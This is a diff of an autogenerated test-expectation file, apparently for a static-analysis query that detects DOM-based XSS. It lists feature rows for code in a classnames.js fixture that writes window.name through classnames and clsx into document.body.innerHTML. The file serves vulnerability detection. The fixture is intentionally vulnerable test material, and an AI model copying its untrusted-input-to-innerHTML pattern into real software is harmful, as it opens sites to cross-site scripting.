classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:13:5:13:17 | document.body | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:13:5:13:17 | document.body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:13:5:13:17 | document.body | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:13:5:13:17 | document.body | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:13:5:13:17 | document.body | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:13:5:13:27 | documen ... nerHTML | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:13:5:13:27 | documen ... nerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:13:5:13:27 | documen ... nerHTML | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:13:5:13:27 | documen ... nerHTML | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:13:5:13:27 | documen ... nerHTML | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:13:5:13:83 | documen ... ` | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:13:5:13:83 | documen ... ` | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:13:5:13:83 | documen ... ` | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:13:5:13:83 | documen ... ` | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:13:5:13:83 | documen ... ` | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:13:14:13:17 | body | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:13:14:13:17 | body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:13:14:13:17 | body | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:13:14:13:17 | body | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:13:14:13:17 | body | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:13:19:13:27 | innerHTML | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:13:19:13:27 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:13:19:13:27 | innerHTML | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:13:19:13:27 | innerHTML | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:13:19:13:27 | innerHTML | fileImports | classnames classnames/bind classnames/dedupe clsx | | autogenerated/Xss/DomBasedXss/classnames.js:13:31:13:83 | `` | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/classnames.js:13:31:13:83 | `` | contextFunctionInterfaces | main() | | autogenerated/Xss/DomBasedXss/classnames.js:13:31:13:83 | `` | contextSurroundingFunctionParameters | () | @@ -12251,12 +92612,27 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/classnames.js:13:32:13:44 | Hello' | +| autogenerated/Xss/DomBasedXss/classnames.js:13:47:13:55 | safeStyle | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:13:47:13:55 | safeStyle | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:13:47:13:55 | safeStyle | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:13:47:13:55 | safeStyle | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:13:47:13:55 | safeStyle | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:13:47:13:68 | exceptional return of safeSty ... w.name) | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:13:47:13:68 | exceptional return of safeSty ... w.name) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:13:47:13:68 | exceptional return of safeSty ... w.name) | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:13:47:13:68 | exceptional return of safeSty ... w.name) | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:13:47:13:68 | exceptional return of safeSty ... w.name) | fileImports | classnames classnames/bind classnames/dedupe clsx | | autogenerated/Xss/DomBasedXss/classnames.js:13:47:13:68 | safeSty ... w.name) | contextFunctionInterfaces | main() | | autogenerated/Xss/DomBasedXss/classnames.js:13:47:13:68 | safeSty ... w.name) | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/classnames.js:13:47:13:68 | safeSty ... w.name) | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | | autogenerated/Xss/DomBasedXss/classnames.js:13:47:13:68 | safeSty ... w.name) | enclosingFunctionName | main | | autogenerated/Xss/DomBasedXss/classnames.js:13:47:13:68 | safeSty ... w.name) | fileImports | classnames classnames/bind classnames/dedupe clsx | | autogenerated/Xss/DomBasedXss/classnames.js:13:47:13:68 | safeSty ... w.name) | stringConcatenatedWith | 'Hello' | +| autogenerated/Xss/DomBasedXss/classnames.js:13:57:13:62 | window | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:13:57:13:62 | window | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:13:57:13:62 | window | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:13:57:13:62 | window | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:13:57:13:62 | window | fileImports | classnames classnames/bind classnames/dedupe clsx | | autogenerated/Xss/DomBasedXss/classnames.js:13:57:13:67 | window.name | CalleeFlexibleAccessPath | safeStyle | | autogenerated/Xss/DomBasedXss/classnames.js:13:57:13:67 | window.name | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/classnames.js:13:57:13:67 | window.name | calleeImports | classnames | @@ -12265,12 +92641,47 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/classnames.js:13:57:13:67 | window.name | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | | autogenerated/Xss/DomBasedXss/classnames.js:13:57:13:67 | window.name | enclosingFunctionName | main | | autogenerated/Xss/DomBasedXss/classnames.js:13:57:13:67 | window.name | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:13:64:13:67 | name | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:13:64:13:67 | name | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:13:64:13:67 | name | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:13:64:13:67 | name | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:13:64:13:67 | name | fileImports | classnames classnames/bind classnames/dedupe clsx | | autogenerated/Xss/DomBasedXss/classnames.js:13:70:13:82 | ">Hello | contextFunctionInterfaces | main() | | autogenerated/Xss/DomBasedXss/classnames.js:13:70:13:82 | ">Hello | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/classnames.js:13:70:13:82 | ">Hello | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | | autogenerated/Xss/DomBasedXss/classnames.js:13:70:13:82 | ">Hello | enclosingFunctionName | main | | autogenerated/Xss/DomBasedXss/classnames.js:13:70:13:82 | ">Hello | fileImports | classnames classnames/bind classnames/dedupe clsx | | autogenerated/Xss/DomBasedXss/classnames.js:13:70:13:82 | ">Hello | stringConcatenatedWith | 'Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:14:5:14:12 | document | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:14:5:14:12 | document | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:14:5:14:17 | document.body | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:14:5:14:17 | document.body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:14:5:14:17 | document.body | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:14:5:14:17 | document.body | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:14:5:14:17 | document.body | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:14:5:14:27 | documen ... nerHTML | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:14:5:14:27 | documen ... nerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:14:5:14:27 | documen ... nerHTML | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:14:5:14:27 | documen ... nerHTML | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:14:5:14:27 | documen ... nerHTML | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:14:5:14:77 | documen ... ` | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:14:5:14:77 | documen ... ` | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:14:5:14:77 | documen ... ` | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:14:5:14:77 | documen ... ` | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:14:5:14:77 | documen ... ` | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:14:14:14:17 | body | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:14:14:14:17 | body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:14:14:14:17 | body | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:14:14:14:17 | body | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:14:14:14:17 | body | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:14:19:14:27 | innerHTML | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:14:19:14:27 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:14:19:14:27 | innerHTML | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:14:19:14:27 | innerHTML | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:14:19:14:27 | innerHTML | fileImports | classnames classnames/bind classnames/dedupe clsx | | autogenerated/Xss/DomBasedXss/classnames.js:14:31:14:77 | `` | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/classnames.js:14:31:14:77 | `` | contextFunctionInterfaces | main() | | autogenerated/Xss/DomBasedXss/classnames.js:14:31:14:77 | `` | contextSurroundingFunctionParameters | () | @@ -12283,6 +92694,16 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/classnames.js:14:32:14:44 | Hello' | +| autogenerated/Xss/DomBasedXss/classnames.js:14:47:14:55 | safeStyle | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:14:47:14:55 | safeStyle | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:14:47:14:55 | safeStyle | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:14:47:14:55 | safeStyle | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:14:47:14:55 | safeStyle | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:14:47:14:62 | exceptional return of safeStyle('foo') | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:14:47:14:62 | exceptional return of safeStyle('foo') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:14:47:14:62 | exceptional return of safeStyle('foo') | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:14:47:14:62 | exceptional return of safeStyle('foo') | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:14:47:14:62 | exceptional return of safeStyle('foo') | fileImports | classnames classnames/bind classnames/dedupe clsx | | autogenerated/Xss/DomBasedXss/classnames.js:14:47:14:62 | safeStyle('foo') | contextFunctionInterfaces | main() | | autogenerated/Xss/DomBasedXss/classnames.js:14:47:14:62 | safeStyle('foo') | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/classnames.js:14:47:14:62 | safeStyle('foo') | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | @@ -12303,6 +92724,36 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/classnames.js:14:64:14:76 | ">Hello | enclosingFunctionName | main | | autogenerated/Xss/DomBasedXss/classnames.js:14:64:14:76 | ">Hello | fileImports | classnames classnames/bind classnames/dedupe clsx | | autogenerated/Xss/DomBasedXss/classnames.js:14:64:14:76 | ">Hello | stringConcatenatedWith | 'Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:15:5:15:12 | document | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:15:5:15:12 | document | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:15:5:15:17 | document.body | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:15:5:15:17 | document.body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:15:5:15:17 | document.body | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:15:5:15:17 | document.body | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:15:5:15:17 | document.body | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:15:5:15:27 | documen ... nerHTML | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:15:5:15:27 | documen ... nerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:15:5:15:27 | documen ... nerHTML | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:15:5:15:27 | documen ... nerHTML | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:15:5:15:27 | documen ... nerHTML | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:15:5:15:78 | documen ... ` | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:15:5:15:78 | documen ... ` | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:15:5:15:78 | documen ... ` | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:15:5:15:78 | documen ... ` | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:15:5:15:78 | documen ... ` | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:15:14:15:17 | body | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:15:14:15:17 | body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:15:14:15:17 | body | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:15:14:15:17 | body | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:15:14:15:17 | body | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:15:19:15:27 | innerHTML | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:15:19:15:27 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:15:19:15:27 | innerHTML | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:15:19:15:27 | innerHTML | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:15:19:15:27 | innerHTML | fileImports | classnames classnames/bind classnames/dedupe clsx | | autogenerated/Xss/DomBasedXss/classnames.js:15:31:15:78 | `` | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/classnames.js:15:31:15:78 | `` | contextFunctionInterfaces | main() | | autogenerated/Xss/DomBasedXss/classnames.js:15:31:15:78 | `` | contextSurroundingFunctionParameters | () | @@ -12315,12 +92766,27 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/classnames.js:15:32:15:44 | Hello' | +| autogenerated/Xss/DomBasedXss/classnames.js:15:47:15:50 | clsx | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:15:47:15:50 | clsx | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:15:47:15:50 | clsx | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:15:47:15:50 | clsx | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:15:47:15:50 | clsx | fileImports | classnames classnames/bind classnames/dedupe clsx | | autogenerated/Xss/DomBasedXss/classnames.js:15:47:15:63 | clsx(window.name) | contextFunctionInterfaces | main() | | autogenerated/Xss/DomBasedXss/classnames.js:15:47:15:63 | clsx(window.name) | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/classnames.js:15:47:15:63 | clsx(window.name) | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | | autogenerated/Xss/DomBasedXss/classnames.js:15:47:15:63 | clsx(window.name) | enclosingFunctionName | main | | autogenerated/Xss/DomBasedXss/classnames.js:15:47:15:63 | clsx(window.name) | fileImports | classnames classnames/bind classnames/dedupe clsx | | autogenerated/Xss/DomBasedXss/classnames.js:15:47:15:63 | clsx(window.name) | stringConcatenatedWith | 'Hello' | +| autogenerated/Xss/DomBasedXss/classnames.js:15:47:15:63 | exceptional return of clsx(window.name) | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:15:47:15:63 | exceptional return of clsx(window.name) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:15:47:15:63 | exceptional return of clsx(window.name) | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:15:47:15:63 | exceptional return of clsx(window.name) | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:15:47:15:63 | exceptional return of clsx(window.name) | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:15:52:15:57 | window | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:15:52:15:57 | window | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:15:52:15:57 | window | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:15:52:15:57 | window | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:15:52:15:57 | window | fileImports | classnames classnames/bind classnames/dedupe clsx | | autogenerated/Xss/DomBasedXss/classnames.js:15:52:15:62 | window.name | CalleeFlexibleAccessPath | clsx | | autogenerated/Xss/DomBasedXss/classnames.js:15:52:15:62 | window.name | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/classnames.js:15:52:15:62 | window.name | calleeImports | clsx | @@ -12329,12 +92795,27 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/classnames.js:15:52:15:62 | window.name | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | | autogenerated/Xss/DomBasedXss/classnames.js:15:52:15:62 | window.name | enclosingFunctionName | main | | autogenerated/Xss/DomBasedXss/classnames.js:15:52:15:62 | window.name | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:15:59:15:62 | name | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:15:59:15:62 | name | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:15:59:15:62 | name | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:15:59:15:62 | name | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:15:59:15:62 | name | fileImports | classnames classnames/bind classnames/dedupe clsx | | autogenerated/Xss/DomBasedXss/classnames.js:15:65:15:77 | ">Hello | contextFunctionInterfaces | main() | | autogenerated/Xss/DomBasedXss/classnames.js:15:65:15:77 | ">Hello | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/classnames.js:15:65:15:77 | ">Hello | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | | autogenerated/Xss/DomBasedXss/classnames.js:15:65:15:77 | ">Hello | enclosingFunctionName | main | | autogenerated/Xss/DomBasedXss/classnames.js:15:65:15:77 | ">Hello | fileImports | classnames classnames/bind classnames/dedupe clsx | | autogenerated/Xss/DomBasedXss/classnames.js:15:65:15:77 | ">Hello | stringConcatenatedWith | 'Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:17:5:17:12 | document | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:17:5:17:12 | document | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:17:5:17:17 | document.body | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:17:5:17:17 | document.body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:17:5:17:17 | document.body | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:17:5:17:17 | document.body | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:17:5:17:17 | document.body | fileImports | classnames classnames/bind classnames/dedupe clsx | | autogenerated/Xss/DomBasedXss/classnames.js:17:5:17:27 | documen ... nerHTML | contextFunctionInterfaces | main() | | autogenerated/Xss/DomBasedXss/classnames.js:17:5:17:27 | documen ... nerHTML | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/classnames.js:17:5:17:27 | documen ... nerHTML | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body 